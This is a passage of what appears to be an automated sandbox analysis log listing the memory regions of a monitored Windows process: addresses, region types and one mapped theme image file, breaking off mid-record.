Region: id = 2826 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2830 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2833 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2834 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2835 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2836 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2853 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2854 start_va = 0x10370000 end_va = 0x103effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010370000" filename = "" Region: id = 2855 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2856 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2857 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2858 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2859 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2860 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2861 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2862 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2866 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2867 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2868 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2869 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2871 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2875 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2876 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2877 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2878 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2886 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2887 start_va = 0x10470000 end_va = 0x104effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010470000" filename = "" Region: id = 2888 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2889 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2890 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2891 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2892 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2893 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2894 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2895 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2896 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2897 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2898 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2899 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2900 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2901 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2902 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2903 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2905 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2906 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2907 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2908 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2909 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2910 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2911 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2912 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2913 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2914 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2915 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2916 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2917 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2918 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2919 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2920 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2921 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2922 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2923 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2924 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2925 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2926 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2927 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2928 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2929 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2930 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2931 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2932 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2933 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2934 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2935 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2936 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2937 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2938 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2939 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2940 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2941 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2942 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2943 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2944 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2945 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2946 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2947 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2948 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2949 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2950 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2951 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2952 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2953 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2954 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2955 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2956 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2957 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2958 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2959 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2960 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2961 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2962 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2963 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2964 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2965 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2966 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2967 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2968 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2972 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2973 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2974 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2975 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2976 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2977 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2978 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2979 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2980 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2981 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2982 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2983 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2984 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2985 start_va = 0x54a0000 end_va = 0x5509fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cachedimage_1440_900_pos4.jpg" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CachedImage_1440_900_POS4.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\microsoft\\windows\\themes\\cachedfiles\\cachedimage_1440_900_pos4.jpg") Region: id = 2986 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2987 start_va = 0x9870000 end_va = 0x9d61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009870000" filename = "" Region: id = 2988 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2989 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2990 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2991 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2995 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 2996 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 2997 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2998 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3012 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3013 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3014 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3015 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3020 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3021 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3022 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3023 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3027 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3028 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3029 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3030 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3032 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3033 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3034 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3035 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3036 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3037 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3038 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3039 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3040 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3041 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3042 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3043 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3044 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3045 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3046 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3047 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3048 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3049 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3050 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3051 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3052 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3053 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3054 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3055 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3056 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3057 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3058 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3059 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3060 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3061 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3062 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3063 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3064 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3065 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3066 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3067 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3068 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3069 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3070 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3071 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3072 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3073 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3074 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3075 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3079 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3080 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3083 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3084 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3091 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3092 start_va = 0x1e50000 end_va = 0x1e6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e50000" filename = "" Region: id = 3093 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 3094 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 